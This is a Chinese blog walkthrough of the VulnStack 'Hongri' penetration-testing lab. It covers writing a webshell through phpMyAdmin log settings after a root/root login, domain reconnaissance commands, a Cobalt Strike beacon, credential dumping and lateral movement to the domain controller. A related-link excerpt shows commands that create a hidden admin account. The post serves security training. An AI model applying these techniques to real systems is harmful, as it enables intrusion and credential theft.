红日实战——使用CS拿下域内主机

已于 2023-09-22 19:08:56 修改
阅读量226 收藏 4
点赞数 1
文章标签: 网络
于 2023-09-22 18:59:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a2106883567/article/details/133181984
版权

网络配置

其中win7作为web服务器来使用,与其他两个电脑都在内网中,并且可以互相访问。

win7

含有两个网卡,其中一个为VM13为内网,另一个为NAT连接外网

win 2008

win 2K3

IP分配

win7

外网

内网

win 2008

win 2K3

kali

主机

IP

win7

192.168.109.134

win7

192.168.52.143

win 2008

192.168.52.138

win 2K3

192.168.52.141

kali

192.168.109.132

主机

192.168.109.1

可以看到kali与win7处于在同一个物理网络下

互通情况

使用主机分别去ping三个内网的机器

互通情况如下:

win7与内网主机ping

结果如下:

可以看到内网之间的主机互通,而外网访问不了内网。

服务开启

开启win7中的phpstudy

在浏览器中打开

在主机浏览器上访问192.168.109.194

探测目标

Kali自带了arp扫描器,可以通过这个工具扫描出和自身网卡同一网段的主机

arp-scan -l #扫描网段所有主机

arp-scan -I eth0 -l #扫描指定网段所有ip

使用root权限进行扫描,很快就可以发现在同一个网段下的主机。

扫描目录

使用御剑来扫描目录,可以看到该信息

进入phpMyAdmin

点击上方网址进入内部

使用弱口令root/root进入

这里使用phpmyadmin日志写shell,先查看有没有开启日志

写入的条件如下:

  • root权限
  • 知道绝对路径
  • secure_file_priv没有具体值

show global variables like "%secure%";       来查看日志有没有开启

可以看到没有开启,并且secure_file_priv没有具体值

接下来开启日志并且写入绝对路径

set global general_log="on";

                                                          #开启日志,修改为on

set global general_log_file="C:/phpStudy/WWW/1.php";

                                                             #修改日志路径(在上面提到的phpinfo.php中有泄露路径)

写入一句话木马

SELECT ''

使用蚁剑连接

添加成功,然后就可以对其进行操作

可以操作的命令如下:

whoami                                    # 查看当前用户名
 whoami /all                                # 获取域SID
 
 ipconfig /all                                # 网络配置文件
 route print                                # 打印路由信息
 arp -a                                    # 查看arp缓存,可以发现内网主机
 
 systeminfo                                # 操作系统信息
 systeminfo | findstr /B /C:"OS Name" /C:"OS Version"            # 操作系统、软件版本信息    
 systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"            # 操作系统、软件版本信息(中文)
 echo %PROCESSOR_ARCHITECTURE%                        # 系统体系架构
 wmic product get name,version                        # 系统安装的软件及版本信息
 wmic service list brief                        # 本机服务信息
 tasklist /v                                 # 本机进程
 net statistics workstation                        # 主机开机时间
 schtasks /query /fo LIST /v                        # 计划任务

net user                                                # 查看本地用户
net localgroup administrators                           # 查看本地管理员组(通常包含域用户)
net user xxx                                   # 查看指定用户详细信息

使用CS创建监听器上传并连接木马

已经使用蚁剑连接了主机

接下来创建CS监听,然后创建一个木马文件

使用蚁剑上传并且打开

步骤如下:

可以看见创建成功

将他保存到桌面

使用蚁剑上传

点击上传文件,选择刚刚做好的木马

可以看到上传成功

这个时候使用蚁剑,在终端运行shell.exe

可以看到在监听器上方上线了主机

右键改一下sleep时间间隔

信息收集

右键进入Beacon

shell hostname   查询主机名字

shell net users 查看用户列表

shell net config Workstation 查看域

shell net localgroup administrators 查看域管

shell net group “domain admins” /domain 查看域控

查看所有域成员计算机列表

查找域管

net view 查看当前域列表

查完以后点击即可看到当前域内主机

提权

先抓取服务器凭证

点击转储Hash

然后抓取明文密码

使用插件(需要插件可以私聊我)

这时候可以看见一个SYSTEM*,这个及root权限

横向移动

创建smb监听

横向移动,使用刚刚拿到的凭证去创这个域控

拿下域控,然后拿域控去创剩下的那个主机

完成

a2106883567
关注
牛红红的日记(平平无奇拿下控)
Key_book(句芒安全实验室)
04-02 569
牛红红的日记(平平无奇拿下控) 注:本文首发地址:https://www.sec-in.com 文章作者为-句芒安全实验室-成员之一,欢迎微信搜索关注我们。 一、引文 x年x月x日 晴 我是一只牛,家里的老大,我叫牛红红,我还有六个兄弟,分别是橙黄绿青蓝紫。后来我知道这名字是一个头上带着葫芦的算命的老头起的,长大后我问他为什么要起这个名字,老头说当年他爷爷被妖精抓走,于是他便怒气冲冲的去解救,上去便是一句:“妖精!还我爷爷!”没想到妖精和颜悦色的问了他一个问题,他一直苦苦思索,始终没有结果,说着便给我看了
内网渗透(CS与MSF联动) ATT&CK实战系列一红队实战(一)
qq_41743240的博客
05-17 718
内网渗透之cs与msf联动
红日渗透靶场1实战复现
weixin_43410871的博客
06-24 1593
VulnStack 是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场的渗透过程。
发现内网存活主机的各种姿势
hackzkaq的博客
04-28 984
零基础学黑客,搜索公众号:白帽子左一 在渗透中,当我们拿下一台服务器作为跳板机进一步进行内网渗透时,往往需要通过主机存活探测和端口扫描来收集内网资产。 本文主要是讲nmap的扫描和基于msf的扫描发现内网存活主机,每一个点都尽量详细介绍。 1.基于UDP的扫描 UDP简介:UDP(User Datagram Protocol)是一种无连接的协议,在第四层-传输层,处于IP协议的 上一层。 UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点,也就是说,当报 文发送之后,是无法得知其是否安全完整到达的
内网渗透-横向批量AT-Schtsks
weixin_60329395的博客
07-30 878
拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机呢?这里仅介绍AT&Schtasks命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。...
内网渗透--远程桌面
qq_31065143的博客
04-29 700
内网渗透–远程桌面 前言 学代码审计有些枯燥,加上俺内网啥也不会,学学内网换换口味。 隐藏用户的创建 因为在Windows环境下创建用户后面如果带入一个“$"符号,在net user时默认是不显示的。 利用条件:获得管理员权限 首先在cs中输入以下命令 shell net user admin$ 123456 /add shell net localgroup administrators admin$ /add 第一句是创建一个admin$用户密码为123456.第二句是将用户加入管理组。 我们
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
最新发布
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场
2401_84297455的博客
04-28 1563
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场的渗透过程。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
红日初升——运动医学研究之一:行业概览.rar
09-11
红日初升——运动医学研究之一:行业概览.rar
2024年内网渗透总结——红日靶场①_红日靶机账号密码
2401_84264096的博客
05-01 370
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。最后就是大家最关心的网络安全面试题板块。
2024年最新Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场(1)
2401_84297265的博客
05-03 1668
内网靶场的渗透实验,大概得折腾了我整整 3-4 天才做完(而且各种攻击不畅……),其中 Win7 跳板机执行命令频繁报错如下(各种百度解决方案均行不通,如有知情大佬请赐教,感激不尽……
Vulnstack红日安全内网渗透靶场1实战
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
网络安全——内网渗透完整流程
A_991128a的博客
02-14 374
因为主要还是想练习练习内网,所以用了最简单粗暴的方法去找寻找目标,利用fofa来批量了一波weblogic,不出一会便找到了目标。简单的看了下机器环境,出网,没有杀软(后面发现实际是有一个很小众的防火墙的,但是不拦powershell),有内网环境。所以这里直接尝试cs自带的Scripted Web Delivery模块,直接创建一个web服务用于一键下载和执行powershell。运行刚刚生成的powershell这边的CS成功上线。
内网渗透-cs上线之提权测试方法
lza20001103的博客
05-08 5192
cs上线之提权方法
Windows系统命令查看控制器,用户,主机
weixin_43808555的博客
03-21 1万+
打开Windows的DOS窗口 查看控制器:setlogserver 查看登录用户:query user 查看主机名:ipconfig /all 远程桌面:mstsc 控制器主机系统:Windows server2003 开始==》管理工具==》Active directory 用户和计算机 ...
命令相关命令
冷风
07-20 4379
关于命令的东西,为方便大家,整理一份,希望给大家带来一些帮助!~查询管理员用户:net group “domain admins” /domain查询用户:net user /domain查询名称:net view /domain查询内计算机:net view /domain:XX查询控制器:net time /domain查询所有控制器:dsquery server例:dsquer
cs实现上线linux主机与CrossC2的配置
热门推荐
Shanfenglan's blog
10-12 14万+
CATALOG前言配置CS与CrossC2简单的使用 前言 CS主要用来做windows渗透,现通过CrossC2插件即可实现上线linux主机。 CrossC2下载 CrossC2官方手册 其他须知: 目前只支持cs3.14版本,经测试,4.0版本可以上线主机但无法执行其他任何操作。 配置CS与CrossC2 下载完成CrossC2后打开CrossC2.cna文件 修改CC2_PATH路径为当前路径,并检查CC2_BIN文件类型是否与当前系统一致 将服务端的CS根目录下的文件复制到Cross
Windows控服务器查询命令
weixin_34237596的博客
08-23 1万+
根据Windows版本不同,命令有所不同。查本机用户表 net user查本机管理员 net localhroup administrators查管理用户 net group "domain dadmins" /domain查用户 net user /domain查工作组 net group /domain查名称 net view /domain查内计算机 net view /d...
cs linux内网渗透,记一次利用cs进行内网渗透的过程
weixin_29497981的博客
05-15 1121
记一次利用cs进行内网渗透的过程​首先搭建好cs的服务端和客户端连接,下面正式进行渗透环境kali:192.168.0.226控机:192.168.0.138成员机:192.168.0.251 192.168.0.141操作cs上线首先开启监听cobalt->listeners,host和beacons都为cs服务端的ip地址生成相应的windows木马,上传到靶机251中执行。选择对应的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值